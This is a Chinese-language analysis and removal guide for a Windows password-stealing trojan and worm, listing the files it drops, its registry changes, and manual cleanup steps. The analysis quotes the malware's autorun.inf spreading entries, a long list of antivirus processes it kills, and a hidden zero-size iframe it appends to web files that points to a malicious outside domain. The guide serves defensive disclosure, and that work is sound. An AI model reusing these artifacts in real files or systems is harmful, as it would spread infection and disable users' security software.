病毒名:Trojan-psw.Win32.Magania.os 卡巴 Worm.Win32.Delf.ysa 瑞星
文件变化: 释放文件 C:\WINDOWS\system32\Shell.exe C:\WINDOWS\system32\Shell.pci C:\pass.dic
各分区根目录释放 shell.exe autorun.inf
autorun.inf内容 [Autorun] OPEN=Shell.exe shellexecute=Shell.exe shell\Auto\command=Shell.exe
修改注册表: 创建启动项目 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] <Shell.exe><C:\WINDOWS\system32\Shell.exe> [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL] 为0 破坏显示隐藏文件 其他行为
停止server服务 查找SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\密码防盗专家 综合版 注册表项 找到则将其删除
终止以下进程或关闭窗口 KVXP.KXP KVMonXP.KXP RavMon.exe RavMonClass TfLockDownMain ZoneAlarm ZAFrameWnd VirusScan Symantec AntiVirus Duba Wrapped gift Killer IceSword pjf(ustc)
EGHOST.EXE PasswordGuard.exe MAILMON.EXE KAVPFW.EXE IPARMOR.EXE _AVP32.EXE.. _AVPCC.EXE _AVPM.EXEAVP32.EXE AVPCC.EXE AVPM.EXE AVP.EXE NAVAPW32.EXE NAVW32.EXE nod32kui.exe nod32kru.exe PFW.exe Kfw.exe KAVPFW.exe vsmon.exe Mcshield.exe VsTskMgr.exe naPrdMgr.exe UpdaterUI.exe TBMon.exe scan32.exe Ravmond.exe CCenter.exe RavTask.exe Rav.exe Ravmon.exe RavmonD.exe RavStub.exe KVXP.kxp KvMonXP.kxp KVCenter.kxp KVSrvXP.exe KRegEx.exe UIHost.exe TrojDie.kxp 360Safe.exe 360tray.kxp FrogAgent.exe FYFireWall.exe Rundl132.exe Logo_1.exe Logo1_.exe
遍历非系统分区的.ASP .exe .com .pif .exe .ASPX .COM .HTM .HTML .JSP .PHP文件 感染.ASP .ASPX .COM .HTM .HTML .JSP .PHP 文件 在其后面加入 <iframe src=http://www.photoyahoo5.com width=0 height=0></iframe>的代码
感染.exe .com .pif .exe 在其头部加入64516字节的内容 属于文件头寄生感染
连接网络下载hXXp://www.photoyahoo5.com/tools/01.exe到C盘根目录下
清除方法: 1.安全模式下:(重启系统长按F8直到出现提示,然后选择进入安全模式)
把下面的 代码拷入记事本中然后另存为1.reg文件
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL] "RegPath"="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced" "Text"="@shell32.dll,-30500" "Type"="radio" "CheckedValue"=dword:00000001 "ValueName"="Hidden" "DefaultValue"=dword:00000002 "HKeyRoot"=dword:80000001 "HelpID"="shell.hlp#51105" |
双击1.reg把这个注册表项导入
双击我的电脑,工具,文件夹选项,查看,单击选取"显示隐藏文件或文件夹" 并清除"隐藏受保护的操作系统文件(推荐)"前面的钩。在提示确定更改时,单击“是” 然后确定
然后删除
C:\WINDOWS\system32\Shell.exe C:\WINDOWS\system32\Shell.pci C:\pass.dic |
以及各个分区下面的shell.exe autorun.inf
2.删除病毒启动项(开始菜单-运行-输入“msconfig”-启动-删除带Shell的项) [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] <Shell.exe><C:\WINDOWS\system32\Shell.exe>
3.利用反病毒软件修复受感染的exe文件 4.修复被修改的网页文件
最后建议到down.45it.com下载360安全卫士清理系统恶意软件等
|